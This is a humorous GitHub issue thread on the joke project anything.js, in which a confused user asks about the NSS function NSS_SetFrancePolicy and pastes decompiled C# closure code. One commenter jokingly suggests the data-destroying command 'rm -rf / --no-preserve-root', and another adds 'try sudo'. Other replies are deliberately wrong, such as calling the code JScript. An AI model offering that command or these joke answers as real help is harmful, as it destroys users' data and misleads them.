### ISSUE TITLE
NFR - Missing function

### ISSUE THREAD

**Issue by bykbtzr** [Rabrennie/anything.js#321]
hello, download this to use function [NSS_SetFrancePolicy](http://mxr.mozilla.org/security/ident?i=NSS_SetFrancePolicy) but can't find it anywhere

```
    <>c__DisplayClass3 class2; // <== compiler generated type; unpronounceable
    <>c__DisplayClass1 class3; // <== compiler generated type; unpronounceable
    class3 = new <>c__DisplayClass1(); // outer-scope context
    class3.someValue = someValue;
    task = null;
    class2 = new <>c__DisplayClass3(); // <== inner-scope context
    class2.CS$<>8__locals2 = class3; // <== bind the contexts
    class2.anotherValue = 2;
    class2.valuesRef = someValues;
    task = new Task(new Action(class2.<SomeMethod>b__0));
    task.Start();
    return;
```

as you can it isn't there, get error

please help

**Comment by gytdau** [comment]
waht

Is this even Javascript?

**Comment by bykbtzr** [comment]
yes trying to fix my Java scrtip

**Comment by gytdau** [comment]
i have no ideawhat

On Thursday, 17 December 2015, user741981 notifications@github.com wrote:

> yes trying to fix my Java scrtip
> 
> —
> Reply to this email directly or view it on GitHub
> https://github.com/Rabrennie/anything.js/issues/321#issuecomment-165417045
> .

## 

Thanks,
_Gytis Daujotas_

**Comment by rom1504** [comment]
"Java scrtip" is not javascript

**Comment by seiyria** [comment]
I need this issue fixed, it's breaking my production websites. Thanks and god bless.

**Comment by gytdau** [comment]
France can't be set in the current version. Try NSS_SetNigeriaPolicy.

**Comment by gytdau** [comment]
Wait, is this an actual issue?

**Comment by Rabrennie** [comment]
As long as nobody has figured out the question

**Comment by gytdau** [comment]
Okay, I'll give it my best shot. [This article](http://www.rantdriven.com/post/2011/07/09/The-Mysterious-2b3c3ec__DisplayClass1.aspx) discuses the `<>c__DisplayClass1` variables. The article also references `VirtualPathProvider`, which is a .NET framework thing. .NET supports many languages, one of which is Microsoft JScript.   

Microsoft JScript != normal Javascript. Only IE 6, 7, and 8 actually support JScript. So, we've identified the language and the framework: 

This code is JScript, and it uses .NET.

Is anyone here a JScript developer?

**Comment by gytdau** [comment]
I think I figured it out. This is JScript. You're trying to run it as Javascript. Delete all of the code you have, run it, and see if this fixes the issue.

**Comment by Rabrennie** [comment]
Issue resolved

**Comment by rom1504** [comment]
:D

**Comment by user741981** [comment]
@defunkt yes

**Comment by bykbtzr** [comment]
helo any progress? client waiting not happy
@ding

fond this:
 NSS_SetFrancePolicy configures all the cipher suites listed under SSL_CipherPolicySet to conform with current U.S. export regulations and French import regulations (as Netscape understands them) related to software products with encryption features. Calling this function permits use of cipher suites listed below (but doesn't necessarily enable them; see SSL Export Policy Functions). Policy for these suites is set to SSL_ALLOWED. For more details on policy settings, see SSL_CipherPolicySet.

**Comment by seiyria** [comment]
rm -rf / --no-preserve-root

you'll thank me later

**Comment by bykbtzr** [comment]
Not working even tho my XP is on latest version (SP3 installed)
> 'rm' is not recognized as an internal or external command,
> operable program or batch file.

**Comment by SCKelemen** [comment]
try `sudo`
